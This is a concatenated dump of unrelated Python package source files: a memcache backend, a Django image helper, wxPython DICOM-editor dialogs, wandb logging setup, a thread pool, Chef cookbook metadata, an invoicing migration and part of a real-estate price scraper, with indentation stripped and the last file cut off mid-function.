self._get_memcache_timeout(CACHE_HERD_TIMEOUT))
# Build a reverse map of encoded keys to the original keys, so that
# the returned dict's keys are what users expect (in that they match
# what the user originally entered)
reverse = dict(zip(rvals, keys))
return dict(((reverse[k], v) for k, v in resp.iteritems()))
def close(self, **kwargs):
self._cache.disconnect_all()
def incr(self, key, delta=1):
try:
return self._cache.incr(key_func(key), delta)
except NotFoundError:
raise ValueError("Key '%s' not found" % (key,))
def decr(self, key, delta=1):
try:
return self._cache.decr(key_func(key), delta)
except NotFoundError:
raise ValueError("Key '%s' not found" % (key,))
def set_many(self, data, timeout=None, herd=True):
if herd and timeout != 0:
safe_data = dict(((key_func(k), self._pack_value(v, timeout))
for k, v in data.iteritems()))
else:
safe_data = dict((
(key_func(k), v) for k, v in data.iteritems()))
self._cache.set_multi(safe_data, self._get_memcache_timeout(timeout))
def delete_many(self, keys):
self._cache.delete_multi(map(key_func, keys))
def clear(self):
self._cache.flush_all() | PypiClean |
/django-lightweight-0.2.tar.gz/django-lightweight-0.2/django/core/files/images.py | import struct
import zlib
from django.core.files import File
class ImageFile(File):
"""
A mixin for use alongside django.core.files.base.File, which provides
additional features for dealing with images.
"""
@property
def width(self):
return self._get_image_dimensions()[0]
@property
def height(self):
return self._get_image_dimensions()[1]
def _get_image_dimensions(self):
if not hasattr(self, "_dimensions_cache"):
close = self.closed
self.open()
self._dimensions_cache = get_image_dimensions(self, close=close)
return self._dimensions_cache
def get_image_dimensions(file_or_path, close=False):
"""
Return the (width, height) of an image, given an open file or a path. Set
'close' to True to close the file at the end if it is initially in an open
state.
"""
from PIL import ImageFile as PillowImageFile
p = PillowImageFile.Parser()
if hasattr(file_or_path, "read"):
file = file_or_path
file_pos = file.tell()
file.seek(0)
else:
try:
file = open(file_or_path, "rb")
except OSError:
return (None, None)
close = True
try:
# Most of the time Pillow only needs a small chunk to parse the image
# and get the dimensions, but with some TIFF files Pillow needs to
# parse the whole file.
chunk_size = 1024
while 1:
data = file.read(chunk_size)
if not data:
break
try:
p.feed(data)
except zlib.error as e:
# ignore zlib complaining on truncated stream, just feed more
# data to parser (ticket #19457).
if e.args[0].startswith("Error -5"):
pass
else:
raise
except struct.error:
# Ignore PIL failing on a too short buffer when reads return
# less bytes than expected. Skip and feed more data to the
# parser (ticket #24544).
pass
except RuntimeError:
# e.g. "RuntimeError: could not create decoder object" for
# WebP files. A different chunk_size may work.
pass
if p.image:
return p.image.size
chunk_size *= 2
return (None, None)
finally:
if close:
file.close()
else:
file.seek(file_pos) | PypiClean |
/dvha-edit-0.7.post1.tar.gz/dvha-edit-0.7.post1/dvhaedit/dialogs.py |
# dialogs.py
"""
Classes used to edit pydicom datasets
"""
# Copyright (c) 2020 Dan Cutright
# This file is part of DVHA DICOM Editor, released under a BSD license.
# See the file LICENSE included with this distribution, also
# available at https://github.com/cutright/DVHA-DICOM-Editor
import wx
import re
from pubsub import pub
from pydicom.uid import RE_VALID_UID_PREFIX
from dvhaedit._version import __version__
from dvhaedit.data_table import DataTable
from dvhaedit.dicom_editor import TagSearch
from dvhaedit.dynamic_value import HELP_TEXT
from dvhaedit.paths import LICENSE_PATH
from dvhaedit.utilities import save_csv_to_file
class ErrorDialog:
"""This class allows error messages to be called with a one-liner else-where"""
def __init__(self, parent, message, caption, flags=wx.ICON_ERROR | wx.OK | wx.OK_DEFAULT):
"""
:param parent: wx parent object
:param message: error message
:param caption: error title
:param flags: flags for wx.MessageDialog
"""
self.dlg = wx.MessageDialog(parent, message, caption, flags)
self.dlg.Center()
self.dlg.ShowModal()
self.dlg.Destroy()
class AskYesNo(wx.MessageDialog):
"""Simple Yes/No MessageDialog"""
def __init__(self, parent, msg, caption="Are you sure?",
flags=wx.ICON_WARNING | wx.YES | wx.NO | wx.NO_DEFAULT):
wx.MessageDialog.__init__(self, parent, msg, caption, flags)
class ViewErrorLog(wx.Dialog):
"""Dialog to display the error log in a scrollable window"""
def __init__(self, error_log):
"""
:param error_log: error log text
:type error_log: str
"""
wx.Dialog.__init__(self, None, title='Error log')
self.error_log = error_log
self.button = {'dismiss': wx.Button(self, wx.ID_OK, "Dismiss"),
'save': wx.Button(self, wx.ID_ANY, "Save")}
self.scrolled_window = wx.ScrolledWindow(self, wx.ID_ANY)
self.text = wx.StaticText(self.scrolled_window, wx.ID_ANY,
"The following errors occurred while editing DICOM tags...\n\n%s" % self.error_log)
self.__set_properties()
self.__do_bind()
self.__do_layout()
self.run()
def __do_bind(self):
self.Bind(wx.EVT_BUTTON, self.on_save, id=self.button['save'].GetId())
def __set_properties(self):
self.scrolled_window.SetScrollRate(20, 20)
self.scrolled_window.SetBackgroundColour(wx.WHITE)
def __do_layout(self):
# Create sizers
sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
sizer_text = wx.BoxSizer(wx.VERTICAL)
sizer_buttons = wx.BoxSizer(wx.HORIZONTAL)
# Add error log text
sizer_text.Add(self.text, 0, wx.EXPAND | wx.ALL, 5)
self.scrolled_window.SetSizer(sizer_text)
sizer_wrapper.Add(self.scrolled_window, 1, wx.EXPAND, 0)
# Add buttons
sizer_buttons.Add(self.button['save'], 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_buttons.Add(self.button['dismiss'], 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_wrapper.Add(sizer_buttons, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
self.SetSizer(sizer_wrapper)
self.SetMinSize((700, 600))
self.Fit()
self.Center()
def run(self):
"""Open dialog, close on Dismiss click"""
self.ShowModal()
self.Destroy()
wx.CallAfter(pub.sendMessage, "do_save_dicom_step_2")
def on_save(self, *evt):
"""On save button click, create save window to save error log"""
dlg = wx.FileDialog(self, "Save error log", "", wildcard='*.txt',
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if dlg.ShowModal() == wx.ID_OK:
save_csv_to_file(self.error_log, dlg.GetPath())
dlg.Destroy()
class TagSearchDialog(wx.Dialog):
"""A dialog consisting of a search bar and table of partial DICOM Tag matches"""
def __init__(self, parent):
"""
:param parent: main frame of DVHA DICOM Edit
"""
wx.Dialog.__init__(self, parent, title='DICOM Tag Search')
self.parent = parent
# Create search bar and TagSearch class
self.search_ctrl = wx.SearchCtrl(self, wx.ID_ANY, "")
self.search_ctrl.ShowCancelButton(True)
self.search = TagSearch()
self.note = wx.StaticText(self, wx.ID_ANY, "NOTE: The loaded DICOM file(s) may not have the selected tag.")
# Create table for search results
columns = ['Keyword', 'Tag', 'VR']
data = {c: [''] for c in columns}
self.list_ctrl = wx.ListCtrl(self, wx.ID_ANY, style=wx.BORDER_SUNKEN | wx.LC_REPORT | wx.LC_SINGLE_SEL)
self.data_table = DataTable(self.list_ctrl, data=data, columns=columns, widths=[-2, -2, -2])
# Create buttons
keys = {'select': wx.ID_OK, 'cancel': wx.ID_CANCEL}
self.button = {key: wx.Button(self, id_, key.capitalize()) for key, id_ in keys.items()}
self.__do_bind()
self.__do_layout()
self.run()
def __do_bind(self):
self.Bind(wx.EVT_TEXT, self.update, id=self.search_ctrl.GetId())
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.on_double_click, id=self.list_ctrl.GetId())
self.Bind(wx.EVT_LIST_COL_CLICK, self.data_table.sort_table, self.list_ctrl)
def __do_layout(self):
# Create sizers
sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
sizer_main = wx.BoxSizer(wx.VERTICAL)
sizer_search = wx.BoxSizer(wx.VERTICAL)
sizer_buttons = wx.BoxSizer(wx.HORIZONTAL)
# Add search bar and results table
sizer_search.Add(self.search_ctrl, 0, wx.EXPAND | wx.ALL, 5)
sizer_search.Add(self.note, 0, wx.EXPAND | wx.ALL, 5)
sizer_search.Add(self.list_ctrl, 1, wx.EXPAND | wx.ALL, 5)
sizer_main.Add(sizer_search, 1, wx.EXPAND | wx.ALL, 5)
# Add buttons
sizer_buttons.Add(self.button['select'], 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_buttons.Add(self.button['cancel'], 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_main.Add(sizer_buttons, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
# Add everything to window wrapper
sizer_wrapper.Add(sizer_main, 1, wx.EXPAND | wx.ALL, 5)
self.SetSizer(sizer_wrapper)
self.SetMinSize((700, 400))
self.Fit()
self.Center()
def run(self):
"""Open dialog, perform action if Select button is clicked, then close"""
self.update()
res = self.ShowModal()
if res == wx.ID_OK: # if user clicks Select button
self.set_tag_to_selection()
self.Destroy()
@property
def data_dict(self):
"""Get the DICOM Tag table data with current search_ctrl value"""
return self.search(self.search_ctrl.GetValue())
@property
def selected_tag(self):
"""Get the Tag of the currently selected/activated row in list_ctrl"""
selected_data = self.data_table.selected_row_data
if selected_data:
return selected_data[0][1]
def update(self, *evt):
"""Set the table date based on the current search_ctrl value"""
self.data_table.set_data(**self.data_dict)
def set_tag_to_selection(self):
"""Set the Group and Element list_ctrl values in the main app"""
tag = self.selected_tag
if tag:
self.parent.input['tag_group'].SetValue(tag.group)
self.parent.input['tag_element'].SetValue(tag.element)
self.parent.update_init_value()
self.parent.update_keyword()
def on_double_click(self, evt):
"""Treat double-click the same as selecting a row then clicking Select"""
self.set_tag_to_selection()
self.Close()
class TextViewer(wx.Dialog):
"""Simple dialog to display the LICENSE file and a brief text header in a scrollable window"""
def __init__(self, text, title, min_size):
wx.Dialog.__init__(self, None, title=title)
self.SetMinSize(min_size)
self.scrolled_window = wx.ScrolledWindow(self, wx.ID_ANY)
self.text = wx.StaticText(self.scrolled_window, wx.ID_ANY, text)
self.__set_properties()
self.__do_layout()
self.run()
def __set_properties(self):
self.scrolled_window.SetScrollRate(20, 20)
self.SetBackgroundColour(wx.WHITE)
def __do_layout(self):
sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
sizer_text = wx.BoxSizer(wx.VERTICAL)
sizer_text.Add(self.text, 0, wx.EXPAND | wx.ALL, 5)
self.scrolled_window.SetSizer(sizer_text)
sizer_wrapper.Add(self.scrolled_window, 1, wx.EXPAND, 0)
self.SetSizer(sizer_wrapper)
self.Fit()
self.Center()
def run(self):
self.ShowModal()
self.Destroy()
class About(TextViewer):
"""Simple dialog to display the LICENSE file and a brief text header in a scrollable window"""
def __init__(self):
with open(LICENSE_PATH, 'r', encoding="utf8") as license_file:
license_text = ''.join([line for line in license_file])
license_text = "DVHA DICOM Editor v%s\nedit.dvhanalytics.com\n\n%s" % (__version__, license_text)
TextViewer.__init__(self, license_text, title='About DVHA DICOM Editor', min_size=(700, 500))
class DynamicValueHelp(TextViewer):
def __init__(self):
TextViewer.__init__(self, HELP_TEXT, title='Dynamic Values', min_size=(672, 420))
class AdvancedSettings(wx.Dialog):
def __init__(self, options):
wx.Dialog.__init__(self, None, title='User Settings')
self.options = options
key_map = {'dicom_prefix': 'Prefix:'}
self.combo_box = {key: wx.ComboBox(self, wx.ID_ANY, "") for key in key_map.keys()}
self.label = {key: wx.StaticText(self, wx.ID_ANY, value) for key, value in key_map.items()}
key_map = {'entropy_source': 'Entropy Source:', 'rand_digits': 'Digits:'}
self.text_ctrl = {key: wx.TextCtrl(self, wx.ID_ANY, "") for key in key_map.keys()}
for key, value in key_map.items():
self.label[key] = wx.StaticText(self, wx.ID_ANY, value)
self.button = {'ok': wx.Button(self, wx.ID_OK, 'OK'),
'cancel': wx.Button(self, wx.ID_CANCEL, 'Cancel')}
self.valid_prefix_pattern = re.compile(RE_VALID_UID_PREFIX)
self.__set_properties()
self.__do_bind()
self.__do_layout()
self.run()
def __set_properties(self):
self.combo_box['dicom_prefix'].SetItems(sorted(list(self.options.prefix_dict)))
self.combo_box['dicom_prefix'].SetValue(self.options.prefix)
self.text_ctrl['entropy_source'].SetValue(self.options.entropy_source)
self.text_ctrl['rand_digits'].SetValue(str(self.options.rand_digits))
self.SetMinSize((672, 210))
def __do_bind(self):
self.Bind(wx.EVT_TEXT, self.update_ok_enable, id=self.text_ctrl['rand_digits'].GetId())
self.Bind(wx.EVT_TEXT, self.update_ok_enable, id=self.combo_box['dicom_prefix'].GetId())
self.Bind(wx.EVT_COMBOBOX, self.update_ok_enable, id=self.combo_box['dicom_prefix'].GetId())
def __do_layout(self):
sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
sizer_main = wx.BoxSizer(wx.VERTICAL)
sizer_dicom = wx.StaticBoxSizer(wx.StaticBox(self, wx.ID_ANY, "DICOM UID Generator"), wx.VERTICAL)
sizer_rand = wx.StaticBoxSizer(wx.StaticBox(self, wx.ID_ANY, "Random Number Generator"), wx.VERTICAL)
sizer_buttons = wx.BoxSizer(wx.HORIZONTAL)
sizer_dicom.Add(self.label['dicom_prefix'], 0, wx.EXPAND, 0)
sizer_dicom.Add(self.combo_box['dicom_prefix'], 0, wx.EXPAND, 0)
sizer_dicom.Add(self.label['entropy_source'], 0, wx.EXPAND, 0)
sizer_dicom.Add(self.text_ctrl['entropy_source'], 0, wx.EXPAND, 0)
sizer_main.Add(sizer_dicom, 1, wx.EXPAND, wx.ALL, 5)
sizer_rand.Add(self.label['rand_digits'], 0, wx.EXPAND, 0)
sizer_rand.Add(self.text_ctrl['rand_digits'], 0, 0, 0)
sizer_main.Add(sizer_rand, 0, wx.EXPAND | wx.ALL, 0) # Has 5 border built-in???
sizer_buttons.Add(self.button['ok'], 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_buttons.Add(self.button['cancel'], 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_main.Add(sizer_buttons, 0, wx.ALIGN_RIGHT | wx.ALL, 5)
sizer_wrapper.Add(sizer_main, 0, wx.EXPAND | wx.ALL, 5)
self.SetSizer(sizer_wrapper)
self.Fit()
self.Layout()
self.Center()
def run(self):
if self.ShowModal() == wx.ID_OK:
self.apply_settings()
self.Destroy()
def apply_settings(self):
self.set_prefix()
self.set_entropy()
self.set_rand_digits()
def set_prefix(self):
self.options.prefix = self.prefix
def set_entropy(self):
self.options.entropy_source = self.text_ctrl['entropy_source'].GetValue()
def set_rand_digits(self):
self.options.rand_digits = int(self.text_ctrl['rand_digits'].GetValue())
def update_ok_enable(self, *evt):
self.button['ok'].Enable(self.is_input_valid)
@property
def is_input_valid(self):
return self.is_rand_digit_valid and self.is_prefix_valid
@property
def is_rand_digit_valid(self):
value = self.text_ctrl['rand_digits'].GetValue()
return value.isdigit() and 0 < int(value) <= 64
@property
def prefix(self):
new_value = self.combo_box['dicom_prefix'].GetValue()
if new_value in self.options.prefix_dict.keys():
new_value = self.options.prefix_dict[new_value] + '.'
return new_value
@property
def is_prefix_valid(self):
return self.valid_prefix_pattern.sub('', self.prefix) == '' | PypiClean |
/nvidia_modulus.launch-0.2.0-py3-none-any.whl/modulus/launch/logging/wandb.py | import logging
import os
import wandb
from typing import Literal
from pathlib import Path
from datetime import datetime
from wandb import AlertLevel
from modulus.distributed import DistributedManager
from .utils import create_ddp_group_tag
DEFAULT_WANDB_CONFIG = "~/.netrc"
logger = logging.getLogger(__name__)
_WANDB_INITIALIZED = False
def initialize_wandb(
project: str,
entity: str,
name: str = "train",
group: str = None,
sync_tensorboard: bool = False,
save_code: bool = False,
resume: str = None,
config=None,
mode: Literal["offline", "online", "disabled"] = "offline",
results_dir: str = None,
):
"""Function to initialize wandb client with the weights and biases server.
Parameters
----------
project : str
Name of the project to sync data with
entity : str,
Name of the wanbd entity
sync_tensorboard : bool, optional
sync tensorboard summary writer with wandb, by default False
save_code : bool, optional
Whether to push a copy of the code to wandb dashboard, by default False
name : str, optional
Name of the task running, by default "train"
group : str, optional
Group name of the task running. Good to set for ddp runs, by default None
resume: str, optional
Sets the resuming behavior. Options: "allow", "must", "never", "auto" or None,
by default None.
config : optional
a dictionary-like object for saving inputs , like hyperparameters.
If dict, argparse or absl.flags, it will load the key value pairs into the
wandb.config object. If str, it will look for a yaml file by that name,
by default None.
mode: str, optional
Can be "offline", "online" or "disabled", by default "offline"
results_dir : str, optional
Output directory of the experiment, by default "/<run directory>/wandb"
"""
# Set default value here for Hydra
if results_dir is None:
results_dir = str(Path("./wandb").absolute())
wandb_dir = results_dir
if DistributedManager.is_initialized() and DistributedManager().distributed:
if group is None:
group = create_ddp_group_tag()
start_time = datetime.now().astimezone()
time_string = start_time.strftime("%m/%d/%y_%H:%M:%S")
wandb_name = f"{name}_Process_{DistributedManager().rank}_{time_string}"
else:
start_time = datetime.now().astimezone()
time_string = start_time.strftime("%m/%d/%y_%H:%M:%S")
wandb_name = f"{name}_{time_string}"
if not os.path.exists(wandb_dir):
os.makedirs(wandb_dir)
wandb.init(
project=project,
entity=entity,
sync_tensorboard=sync_tensorboard,
name=wandb_name,
resume=resume,
config=config,
mode=mode,
dir=wandb_dir,
group=group,
save_code=save_code,
)
def alert(title, text, duration=300, level=0, is_master=True):
"""Send alert."""
alert_levels = {0: AlertLevel.INFO, 1: AlertLevel.WARN, 2: AlertLevel.ERROR}
if is_wandb_initialized() and is_master:
wandb.alert(
title=title, text=text, level=alert_levels[level], wait_duration=duration
)
def is_wandb_initialized():
"""Check if wandb has been initialized."""
global _WANDB_INITIALIZED
return _WANDB_INITIALIZED | PypiClean |
/TethysCluster-0.1.6.tar.gz/TethysCluster-0.1.6/tethyscluster/threadpool.py | import time
import Queue
import thread
import traceback
import workerpool
from tethyscluster import exception
from tethyscluster import progressbar
from tethyscluster.logger import log
class DaemonWorker(workerpool.workers.Worker):
"""
Improved Worker that sets daemon = True by default and also handles
communicating exceptions to the parent pool object by adding them to
the parent pool's exception queue
"""
def __init__(self, *args, **kwargs):
super(DaemonWorker, self).__init__(*args, **kwargs)
self.daemon = True
def run(self):
"Get jobs from the queue and perform them as they arrive."
while 1:
# Sleep until there is a job to perform.
job = self.jobs.get()
try:
job.run()
except workerpool.exceptions.TerminationNotice:
break
except Exception, e:
tb_msg = traceback.format_exc()
jid = job.jobid or str(thread.get_ident())
self.jobs.store_exception([e, tb_msg, jid])
finally:
self.jobs.task_done()
def _worker_factory(parent):
return DaemonWorker(parent)
class SimpleJob(workerpool.jobs.SimpleJob):
def __init__(self, method, args=[], kwargs={}, jobid=None,
results_queue=None):
self.method = method
self.args = args
self.kwargs = kwargs
self.jobid = jobid
self.results_queue = results_queue
def run(self):
if isinstance(self.args, list) or isinstance(self.args, tuple):
if isinstance(self.kwargs, dict):
r = self.method(*self.args, **self.kwargs)
else:
r = self.method(*self.args)
elif self.args is not None and self.args is not []:
if isinstance(self.kwargs, dict):
r = self.method(self.args, **self.kwargs)
else:
r = self.method(self.args)
else:
r = self.method()
if self.results_queue:
return self.results_queue.put(r)
return r
class ThreadPool(workerpool.WorkerPool):
def __init__(self, size=1, maxjobs=0, worker_factory=_worker_factory,
disable_threads=False):
self.disable_threads = disable_threads
self._exception_queue = Queue.Queue()
self._results_queue = Queue.Queue()
self._progress_bar = None
if self.disable_threads:
size = 0
workerpool.WorkerPool.__init__(self, size, maxjobs, worker_factory)
@property
def progress_bar(self):
if not self._progress_bar:
widgets = ['', progressbar.Fraction(), ' ',
progressbar.Bar(marker=progressbar.RotatingMarker()),
' ', progressbar.Percentage(), ' ', ' ']
pbar = progressbar.ProgressBar(widgets=widgets, maxval=1,
force_update=True)
self._progress_bar = pbar
return self._progress_bar
def simple_job(self, method, args=[], kwargs={}, jobid=None,
results_queue=None):
results_queue = results_queue or self._results_queue
job = SimpleJob(method, args, kwargs, jobid,
results_queue=results_queue)
if not self.disable_threads:
return self.put(job)
else:
return job.run()
def get_results(self):
results = []
for i in range(self._results_queue.qsize()):
results.append(self._results_queue.get())
return results
def map(self, fn, *seq, **kwargs):
"""
Uses the threadpool to return a list of the results of applying the
function to the items of the argument sequence(s). If more than one
sequence is given, the function is called with an argument list
consisting of the corresponding item of each sequence. If more than one
sequence is given with different lengths the argument list will be
truncated to the length of the smallest sequence.
If the kwarg jobid_fn is specified then each threadpool job will be
assigned a jobid based on the return value of jobid_fn(item) for each
item in the map.
"""
if self._results_queue.qsize() > 0:
self.get_results()
args = zip(*seq)
jobid_fn = kwargs.get('jobid_fn')
for seq in args:
jobid = None
if jobid_fn:
jobid = jobid_fn(*seq)
self.simple_job(fn, seq, jobid=jobid)
return self.wait(numtasks=len(args))
def store_exception(self, e):
self._exception_queue.put(e)
def shutdown(self):
log.info("Shutting down threads...")
workerpool.WorkerPool.shutdown(self)
self.wait(numtasks=self.size())
def wait(self, numtasks=None, return_results=True):
pbar = self.progress_bar.reset()
pbar.maxval = self.unfinished_tasks
if numtasks is not None:
pbar.maxval = max(numtasks, self.unfinished_tasks)
while self.unfinished_tasks != 0:
finished = pbar.maxval - self.unfinished_tasks
pbar.update(finished)
log.debug("unfinished_tasks = %d" % self.unfinished_tasks)
time.sleep(1)
if pbar.maxval != 0:
pbar.finish()
self.join()
exc_queue = self._exception_queue
if exc_queue.qsize() > 0:
excs = [exc_queue.get() for i in range(exc_queue.qsize())]
raise exception.ThreadPoolException(
"An error occurred in ThreadPool", excs)
if return_results:
return self.get_results()
def __del__(self):
log.debug('del called in threadpool')
self.shutdown()
self.join()
def get_thread_pool(size=10, worker_factory=_worker_factory,
disable_threads=False):
return ThreadPool(size=size, worker_factory=_worker_factory,
disable_threads=disable_threads) | PypiClean |
/pulp-cookbook-0.1.0b9.tar.gz/pulp-cookbook-0.1.0b9/pulp_cookbook/metadata.py |
import tarfile
import json
class CookbookMetadata:
"""
Represents metadata extracted from a cookbook tar archive.
Attributes:
metadata (dict): content of the 'metadata.json' file of a cookbook
"""
def __init__(self, metadata):
self.metadata = metadata
@property
def name(self):
return self.metadata["name"]
@property
def version(self):
return self.metadata["version"]
@property
def dependencies(self):
return self.metadata["dependencies"]
@classmethod
def from_cookbook_file(cls, fileobj, name):
"""
Construct a CookbookMetadata instance from a cookbook tar archive.
Args:
fileobj: file object of the cookbook tar archive
name (str): name of the cookbook ("metadata.json" file
is expected to be in the directoy `<name>`)
Returns:
CookbookMetadata: Instance containing the extracted metadata
"""
tf = tarfile.open(fileobj=fileobj)
for element in tf:
if element.isfile() and element.name == name + "/metadata.json":
metadata = json.load(tf.extractfile(element))
# TODO: check name consistency, raise error
return CookbookMetadata(metadata)
raise FileNotFoundError
class Entry:
"""
Universe entry: info about a cookbook in the universe file.
Attributes:
name (str): cookbook name
version (str): cookbook version
download_url (str): URL of cookbook tar package
dependencies (dict): cookbook dependencies
"""
def __init__(self, name, version, download_url, dependencies):
self.name = name
self.version = version
self.download_url = download_url
self.dependencies = dependencies
@property
def data(self):
return {
"location_type": "uri",
"location_path": self.download_url,
"download_url": self.download_url,
"dependencies": self.dependencies,
}
class Universe:
"""
Represents the cookbook universe.
Describes cookbooks contained within the directory.
Attributes:
relative_path (str): An relative path to the universe.
"""
def __init__(self, relative_path):
"""
Represents the cookbook universe.
Args:
relative_path (str): An relative path to the universe.
"""
self.relative_path = relative_path
def read(self):
"""
Read the universe file at `relative_path` and yield cookbook entries.
Yields: Entry: for each cookbook.
"""
with open(self.relative_path) as fp:
universe = json.load(fp)
for cookbook_name, cookbook_versions in universe.items():
for cookbook_version, cookbook_meta in cookbook_versions.items():
yield Entry(
cookbook_name,
cookbook_version,
cookbook_meta["download_url"],
cookbook_meta["dependencies"],
)
def write(self, entries):
"""
Write the universe JSON file.
Args:
entries (iterable): The entries to be written.
"""
universe = dict()
for entry in entries:
try:
versions = universe[entry.name]
except KeyError:
universe[entry.name] = versions = dict()
versions[entry.version] = entry.data
with open(self.relative_path, "w+") as fp:
json.dump(universe, fp) | PypiClean |
/django-invoicing-4.3.1.tar.gz/django-invoicing-4.3.1/invoicing/migrations/0017_auto_20180619_1349.py |
from django.db import migrations, models
import django_countries.fields
from internationalflavor.vat_number import VATNumberField
class Migration(migrations.Migration):
dependencies = [
('invoicing', '0016_update_credit_notes'),
]
operations = [
migrations.AddField(
model_name='invoice',
name='customer_email',
field=models.EmailField(blank=True, max_length=254),
),
migrations.AddField(
model_name='invoice',
name='customer_phone',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='invoice',
name='bank_city',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='bank_country',
field=django_countries.fields.CountryField(blank=True, default='', max_length=2),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='bank_name',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='bank_street',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='bank_zip',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='constant_symbol',
field=models.CharField(blank=True, default='', max_length=64),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='customer_city',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='customer_registration_id',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='customer_street',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='customer_tax_id',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='customer_vat_id',
field=VATNumberField(blank=True, default='', max_length=13),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='customer_zip',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='delivery_method',
field=models.CharField(default='PERSONAL_PICKUP', max_length=64),
),
migrations.AlterField(
model_name='invoice',
name='issuer_email',
field=models.EmailField(blank=True, default='', max_length=254),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='issuer_name',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='issuer_phone',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='note',
field=models.CharField(blank=True, default='Thank you for using our services.', max_length=255),
),
migrations.AlterField(
model_name='invoice',
name='reference',
field=models.CharField(blank=True, default='', max_length=140),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='shipping_city',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='shipping_country',
field=django_countries.fields.CountryField(blank=True, default='', max_length=2),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='shipping_name',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='shipping_street',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='shipping_zip',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='status',
field=models.CharField(default='NEW', max_length=64),
),
migrations.AlterField(
model_name='invoice',
name='subtitle',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='supplier_city',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='supplier_registration_id',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='supplier_street',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='supplier_tax_id',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='supplier_vat_id',
field=VATNumberField(blank=True, default='', max_length=13),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='supplier_zip',
field=models.CharField(blank=True, default='', max_length=255),
preserve_default=False,
),
migrations.AlterField(
model_name='invoice',
name='type',
field=models.CharField(default='INVOICE', max_length=64),
),
migrations.AlterField(
model_name='item',
name='unit',
field=models.CharField(default='PIECES', max_length=64),
),
] | PypiClean |
/real_estate_scrape-0.1.5-py3-none-any.whl/realestatescrape/__init__.py | import logging
import os
import re
from datetime import datetime, timezone
import matplotlib.pyplot as plt
import pandas as pd
import requests
from lxml import html
csvfile = "data.csv"
plotfile = "data.png"
sites = [
{
"name": "redfin",
"xpath": "//div[@class='statsValue']//span/text()",
},
{
"name": "zillow",
"xpath": (
# find the button containing "Zestimate"
"//button[contains(text(), 'Zestimate')]"
# find its parent
"/parent::node()"
# find its span descendent containing a "$"
"//span[contains(text(), '$')]/text()"
),
},
]
def get_page(url: str) -> bytes:
session = requests.Session()
# User-Agent required otherwise you get blocked
session.headers.update({"User-Agent": "Mozilla/5.0"})
if "SCRAPERAPI_KEY" in os.environ:
logging.info("Configuring requests session to use scraper API")
session.params = {
"api_key": os.environ["SCRAPERAPI_KEY"],
"url": url,
}
url = "http://api.scraperapi.com"
logging.info(f"Start getting {session.params['url']} via {url}")
else:
logging.info(f"Start getting {url=}")
response = session.get(url, timeout=60)
logging.info(f"Finish getting {url=}")
return response.content
def get_value(url: str, xpath: str) -> str:
page = get_page(url)
tree = html.fromstring(page)
try:
value = tree.xpath(xpath)[0]
return re.sub(r"[\$,\,]", "", value)
except IndexError:
logging.error(f"Could not find {xpath=} in {url=}")
logging.error(f"Last 1000 characters of page: {page[-1000:].decode()}")
raise
def retry_get_value(url: str, xpath: str, n: int = 3) -> str:
exceptions = 0
while exceptions < n:
logging.info(f"Start scrape {exceptions+1}/{n}: {url=} {xpath}")
try:
value = get_value(url, xpath)
logging.info(f"Finish scrape {exceptions+1}/{n}. {value=}")
return value
except Exception as e:
logging.error(f"Finish scrape {exceptions+1}/{n}. Failed: {e}")
exceptions += 1
return "NaN"
def ensure_csv() -> None:
